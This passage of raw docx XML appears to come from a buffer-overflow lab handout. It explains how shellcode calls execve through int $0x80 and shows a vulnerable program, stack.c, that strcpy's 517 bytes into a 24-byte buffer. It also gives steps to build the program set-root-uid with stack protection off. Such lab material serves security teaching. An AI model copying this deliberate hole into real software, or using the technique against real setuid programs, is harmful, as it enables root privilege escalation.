        <w:t>setting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>%edx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:spacing w:val="-46"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>0.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="11"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Third,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system</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="27"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>call</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="27"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>execve()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:spacing w:val="-47"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>called</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="27"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>when</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="25"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>we</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="27"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="27"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>%al</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:spacing w:val="-46"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>11,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="29"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="25"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>execute</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="27"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>$0x80</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9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697" w:val="left" w:leader="none"/>
          <w:tab w:pos="698" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="697" w:right="0" w:hanging="538"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Vulnerable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Program</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="183"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:position w:val="-3"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-7"/>
          <w:position w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>stack.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>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/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="218" w:lineRule="auto"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:position w:val="-3"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-9"/>
          <w:position w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>This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program</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>has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a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>buffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>overflow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>vulnerability.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>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/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="225" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="3644"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:position w:val="-3"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-9"/>
          <w:position w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>Our</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>task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exploit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this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vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>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/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-129"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>#include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&lt;stdlib.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="261" w:lineRule="auto" w:before="25"/>
        <w:ind w:left="160" w:right="7306"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>#include &lt;stdio.h&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-130"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>#include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&lt;string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="218" w:lineRule="auto"/>
        <w:ind w:left="16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bof(char</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>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str)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="241" w:lineRule="exact"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="22"/>
        <w:ind w:left="683"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>char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buffer[24];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="225" w:lineRule="auto"/>
        <w:ind w:left="683" w:right="1541"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:position w:val="-3"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-9"/>
          <w:position w:val="-3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following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statement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has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a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>buffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>overflow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>problem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>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/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-129"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>strcpy(buffer,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str);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="94"/>
        <w:ind w:left="683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1;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="22"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="700" w:footer="0" w:top="1280" w:bottom="280" w:left="1280" w:right="1000"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="218" w:lineRule="auto" w:before="107"/>
        <w:ind w:left="16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main(int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argc,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char</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:position w:val="-3"/>
        </w:rPr>
        <w:t>**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>argv)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="241" w:lineRule="exact"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="21"/>
        <w:ind w:left="683" w:right="7441"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-33"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>str[517];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="22"/>
        <w:ind w:left="683" w:right="7441"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>FILE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-33"/>
        </w:rPr>
        <w:t>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badfile;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="261" w:lineRule="auto" w:before="94"/>
        <w:ind w:left="683" w:right="4166"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>badfile = fopen("badfile", "r");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fread(str,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sizeof(char),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517,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badfile);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-129"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>bof(str);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="261" w:lineRule="auto"/>
        <w:ind w:left="683" w:right="5343"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>printf("Returned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Properly\n");</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-129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3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>1;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="248" w:lineRule="exact"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="498"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Compile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above</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>vulnerable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>program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make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set-root-uid.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3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achieve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compiling</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>it</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="271" w:lineRule="exact" w:before="18"/>
        <w:ind w:left="160"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="42"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="42"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:spacing w:val="-31"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>account,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="49"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="42"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/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42"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>executable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="42"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="43"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>4755</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:spacing w:val="-31"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>(don’t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="42"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>forget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="42"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="42"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>include</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="42"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="43"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>execstack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:spacing w:val="-31"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="271" w:lineRule="exact"/>
        <w:ind w:left="160"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>-fno-stack-protector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-41"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="32"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="32"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>turn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="32"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
